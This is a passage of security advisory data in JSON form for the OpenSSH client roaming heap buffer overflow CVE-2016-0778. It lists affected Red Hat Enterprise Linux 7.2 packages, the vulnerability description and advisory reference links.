"7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "OpenSSH: Client buffer-overflow when using roaming connections" } ] }
gsd-2016-0778
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2016-0778", "description": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.", "id": "GSD-2016-0778", "references": [ "https://www.suse.com/security/cve/CVE-2016-0778.html", "https://www.debian.org/security/2016/dsa-3446", "https://access.redhat.com/errata/RHSA-2016:0043", "https://ubuntu.com/security/CVE-2016-0778", "https://advisories.mageia.org/CVE-2016-0778.html", "https://alas.aws.amazon.com/cve/html/CVE-2016-0778.html", "https://linux.oracle.com/cve/CVE-2016-0778.html" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2016-0778" ], "details": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.", "id": "GSD-2016-0778", "modified": "2023-12-13T01:21:17.587553Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "secalert@redhat.com", "ID": "CVE-2016-0778", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/", "refsource": "CONFIRM", "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "name": "SUSE-SU-2016:0117", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/", "refsource": "CONFIRM", "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "name": "APPLE-SA-2016-03-21-5", "refsource": "APPLE", "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375", "refsource": "CONFIRM", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375" }, { "name": "20160114 Qualys Security Advisory - Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778", "refsource": "BUGTRAQ", "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "name": "https://support.apple.com/HT206167", "refsource": "CONFIRM", "url": "https://support.apple.com/HT206167" }, { "name": "FEDORA-2016-4556904561", "refsource": "FEDORA", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html" }, { "name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734", "refsource": "CONFIRM", "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "name": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680", "refsource": "CONFIRM", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680" }, { "name": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "refsource": "CONFIRM", "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "name": "http://www.openssh.com/txt/release-7.1p2", "refsource": "CONFIRM", "url": "http://www.openssh.com/txt/release-7.1p2" }, { "name": "openSUSE-SU-2016:0128", "refsource": "SUSE", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "name": "80698", "refsource": "BID", "url": "http://www.securityfocus.com/bid/80698" }, { "name": 